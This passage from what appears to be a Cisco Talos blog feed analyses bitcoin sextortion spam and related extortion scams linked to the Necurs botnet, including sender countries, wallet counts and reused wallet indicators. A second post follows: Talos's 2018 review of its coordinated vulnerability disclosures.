The sending IPs are distributed among many countries, however roughly 50 percent of the sextortion messages come from only five countries: Vietnam (15.9 percent), Russia (15.7 percent), India (8.5 percent), Indonesia (4.9 percent) and Kazakhstan (4.7 percent). If some of these countries seem familiar, that may be because India and Vietnam were previously identified as having exceedingly large numbers of machines that are infected with the Necurs botnet, a well-known distributor of many pieces of malware.

Distribution of sender IP addresses by country

Despite sending more than 233,000 email messages as part of these campaigns, the number of unique recipients was actually fairly low. Talos found only 15,826 distinct victim email addresses. This means that the attackers were sending an average of almost 15 sextortion spam messages per recipient. One unlucky victim from our dataset was contacted a staggering 354 times.

Payment demands
Each sextortion spam contains a payment demand. The payment requested by the attackers varies according to the specific campaign, but in this instance, it is a randomly generated number consisting of an integer between one and seven, followed by three zeros ($1,000 - $7,000). These six different payment amounts appear with almost identical frequency across the entire set of emails, suggesting that there was no effort made on the part of the attackers to tailor their payment demands to individual victims.

Cryptocurrency wallets
In addition to the payment demand, each sextortion message also contains a bitcoin (BTC) wallet address to receive the payment from the victim. In total, Talos identified 58,611 unique bitcoin wallet addresses associated with these two spam campaigns. This works out to an average of approximately four sextortion messages per bitcoin wallet. Out of the approximately 58,000 bitcoin wallets, only 83 wallets have positive balances. However, the balances in those 83 wallets add up to 23.3653711 bitcoins, the equivalent of $146,380.31. That isn't too bad considering the attackers have only been distributing this particular scam for roughly 60 days, and do not actually possess any compromising material concerning the victim.

If you look at the number of unique bitcoin wallets and unique victim email addresses seen over time, you can see that the attackers periodically inject their ongoing campaign with fresh data. The number of unique bitcoin wallets tends to peak and then reduce over time, until it peaks again, with another fresh batch of attacker-generated bitcoin wallets. The last major injection of fresh wallet addresses occurred on Oct. 9. The same can be seen regarding unique message recipients over time, with what appears to be a large injection of fresh recipients also occurring around Oct. 9.

Unique versus duplicate bitcoin wallets and recipient email addresses

Unfortunately, as we dug further into the individual bitcoin wallets possessing positive balances, we noticed some oddities regarding the wallet payment amounts. Several wallets had received transfers that fell well under the minimum $1,000 payment that was demanded as part of this specific campaign. The payment amounts were low enough to fall outside the realm of what could be logically explained as a result of fluctuations in the price of bitcoin.

Bitcoin wallet found in the Aaron Smith sextortion spam that contains far less than the minimum demand of $1,000.

Our researchers discovered that some of the wallets used in this attack were also being used in other attacks. The attackers were reusing some of their bitcoin wallet addresses across different spam campaigns.

In light of the attackers' bitcoin wallet reuse, Talos decided to expand our research to include all spam messages that mention "bitcoin," while also possessing a string of 26-35 characters resembling a bitcoin wallet address in the body of the email.

Attackers' use of personal information
One of the first related sextortion campaigns we discovered utilized the victim's telephone number instead of their data breach password. While a telephone number isn't nearly as private or confidential as a user's password, it is still arguably somewhat personal. By including the victim's telephone number, the attackers were hoping they could convince recipients that their sextortion scam was indeed real.

An example sextortion attack using victims' phone numbers

If you read the text closely, you will notice that much of the text in this email is virtually identical to the text contained in the "Aaron Smith" campaigns Talos analyzed previously, especially the text in the closing paragraph.

As a matter of fact, while searching SpamCop, we encountered a sample email message where the attackers appeared to have mistakenly disclosed their template containing the choose-your-own-adventure-style text variations for generating varied message bodies as part of their sextortion spam attack.

An example of a sextortion template message mistakenly emailed out by the attackers

Internationalized sextortion
Security researchers at IBM X-Force recently discovered a sextortion campaign that was purportedly sent through the Necurs' botnet infrastructure in late September 2018. Using the 20 bitcoin wallet indicators of compromise (IoCs) provided by IBM, Talos identified nearly 1,000 different sending IP addresses involved in transmitting both the "Aaron Smith" spam, as well the international sextortion spam that IBM X-Force associated with the Necurs botnet. The overlap in sending IP infrastructure indicates, with a reasonable degree of confidence, that the same spammers are behind both of these sextortion campaigns.

Besides the "7 different languages (ENG, GER, FRE, ITA, JPN, KOR, ARA)" of sextortion spam identified in the X-Force blog, Talos identified additional variations of a similar sextortion campaign in Czech, Spanish, Norwegian, Swedish and Finnish.

An example of a sextortion message in Spanish

Additional attack variations
There were other, similar forms of sextortion spam originating from some of the same Necurs-sending IP infrastructure. Below is an example of a sextortion spam email that is attempting to look like a support ticket. For extra authenticity, the message even includes text near the top of the body that reads: "Camera Ready, Notification: <date>."

An example of a sextortion email disguised as a "Ticket"

The attackers used that same exact bitcoin wallet in a completely different type of bitcoin-related email scam. The BTC wallet 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy located in the "Ticket" example above, also appears in an explicit video-for-bitcoin scam. In the sex video swindle, the attackers impersonate a young girl from the Russian Federation, and promise to send a custom explicit video in exchange for a deposit of $100 into the attackers' bitcoin wallet.

An example of an explicit video-for-bitcoin message containing a duplicate sextortion bitcoin wallet

Talos identified additional bitcoin wallets that overlapped, which revealed additional attacks, also likely perpetrated by the same group of spammers. For example, the bitcoin wallet 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 not only appears in the "Ticket"-type sextortion scam messages detailed above, but it also appears in a different scheme meant to extort bitcoin from recipients who may be cheating on their significant other. The spammers claim to have been following the victim, where they obtained photographic evidence concerning the recipient's purported infidelity.

An example of an illicit relationship extortion message

Other (unrelated?) attack variations
As we reviewed additional bitcoin-related spam from SpamCop, we came across several other types of social engineering attacks aimed at obtaining bitcoin payments.

In a clever twist on the "I-know-you-are-cheating" extortion example detailed above, attackers claim to have proof that the victim's partner is in fact cheating on them. While the wording of the text in the message feels somewhat familiar, it is dissimilar enough to other extortion attacks (by containing an attached QR code, for example) that it may in fact be the handiwork of a completely different group of attackers.

A variation of the extortion attack offering victims proof of their partner's infidelity

Talos also discovered messages related to a much more frightening and violent variety of extortion. In these messages, the attackers claim to have been paid to kill the recipient of the email. The hitmen claim to already have their transportation arranged, but since they have had a change of heart, they are now willing to sell information about who hired them to their potential victim. Again, the formula and wording the message sound quite similar to text we witnessed in multiple sextortion emails. Though we suspect it, Talos cannot say for certain that these violent extortion emails are in fact the work of the same attackers.

An example of a violent extortion message threatening to kill the recipient

Other examples of social engineering
There were some bitcoin-related spam campaigns we noticed that, while they had very little connecting them to the spam sent via the Necurs botnet, they represented creative attempts to coerce some victims through social engineering.

First, there was an attack targeting victims with a propensity to fall for get-rich-quick schemes. In this offer, recipients are encouraged to send bitcoin to a wallet address where their bitcoin will magically double in value within three hours' time. This bitcoin "doubler" claims to exploit an undisclosed "bug in the system." While the average user may be able to realize quickly this is a scam, some users who are not as educated on the concept of bitcoin may be susceptible to this type of spam.

An example of the bitcoin doubler email

Other bitcoin-related spam targets those who might be inclined to donate to charity. While easing the suffering of children affected by military aggression is a most admirable cause, we couldn't find anything in this message to indicate that this is a legitimate charitable organization.

An example of the questionable "Charitable Children's Fund" email

We also discovered a piece of spam that claims to be "positive junk mail." The body of the message reads, "You know those emails that keep circulating trying to extort you for bitcoin claiming they have compromised the camera in your computer and have embarrassing videos and photos that they plan to share with your friends and family?...This IS NOT one of those!"

An example of the bitcoin lottery spam

In the Q&A section near the bottom of this email the spammers write, "Q: How do we know this is legitimate? A: You don't. We can't actually post proof without exposing ourselves as well as the winner. Take it for what it's worth. We apologize but this is the best we can do."

If you're curious about how the whole Oct. 4 bitcoin lottery drawing turned out, note that there is only one transaction for the bitcoin wallet mentioned in the spam. That transaction happened back on Sept. 28 and was for $4.

Most anti-spam solutions will filter out obvious sextortion attempts like the ones we highlighted in this post. However, that is no silver bullet. When these kinds of spam campaigns make it into users' email inboxes, many of them may not be educated enough to identify that it's a scam designed to make them give away their bitcoins. Unfortunately, it is clear from the large amount of bitcoin these actors secured that there is still a long way to go in terms of educating potential victims.

Indicators of compromise (IOC)
Here is a list of the 58,611 bitcoin wallets used by the attackers in the "Aaron Smith" sextortion spam.

Talos Vulnerability Discovery Year in Review - 2018

Tue, 30/10/2018 - 16:13

Cisco Talos' Vulnerability Discovery Team investigates software and operating system vulnerabilities in order to discover them before malicious threat actors. We provide this information to vendors so that they can create patches and protect their customers as soon as possible. We strive to improve the security of our customers with detection content, which protects them while the vendor is creating, testing, and delivering the patch. These patches ultimately remove the vulnerability in question, which increases security not only for our customers but for everyone. Once these patches become available, the Talos detection content becomes public, as well. You can find all of the release information via the Talos vulnerability information page here.

Over the past several years, our research team has improved the pace at which we disclose vulnerabilities. Talos increased the number of vulnerabilities it disclosed 22 percent year-over-year, and we hope to continue to grow that number. As of Oct. 23, Cisco has updated it's vendor vulnerability and discovery policy. You can read the complete details here.

Our coordinated disclosure philosophy involves working closely with vendors to address the vulnerabilities discovered by our team. Our focus is to protect customers and share this data in coordination with the software vendor. Responsible reporting involves working within the policy outlined below, while also ensuring the vendor has an opportunity to resolve the issue in a timely manner.
Timeline of actions to be taken by Cisco

In the interest of fostering coordinated vulnerability disclosure, Cisco will attempt to work with any vendor on reasonable adjustments to the above timeline if progress is being made and the 90-day default timeline is not adequate for creating a patch or other type of mitigation that addresses the vulnerability. Extenuating circumstances may result in adjustments to the disclosures and timelines when reasonably necessary.

Reporting on Talosintelligence.comThe Talos Vulnerability DiscoveryTeam released more than 200 advisories in Cisco's fiscal year 2017, resulting in 202 CVEs. In FY2018 (period ended July 31, 2018), the team increased the discovery total to 251 advisories, which led to nearly 400 CVEs. During FY2018, Talos contributed at least one vulnerability in every Adobe Reader bulletin, 20 vulnerabilities in Foxit PDF Reader, more than 90 advisories for internet-of-things (IoT) devices, eight vulnerabilities in Natus Neuroworks (EEG software), as well as various vulnerabilities in: VMWare, Nvidia Graphics Drivers, OpenOffice, Intel Graphics Drivers, Ethereum applications, and Google PDFium.

FY2018 saw a marked increase in the number of IoT vulnerabilities identified. As IoT devices increase their market share and devices proliferate the associated vulnerabilities are increasing as server exploitation continues to decline.

ConclusionFinding and disclosing zero-day vulnerabilities via coordinated disclosure helps improve the overall security of the devices and software people use on a day-to-day basis. Talos is committed to this effort, developing programmatic ways to identify problems or flaws that could be otherwise exploited by malicious attackers, as well as having dedicated resources working to ensure clear communication and coordination. These developments help secure the platforms and software customers use and also help provide insight into how Talos can improve its own processes.

For vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.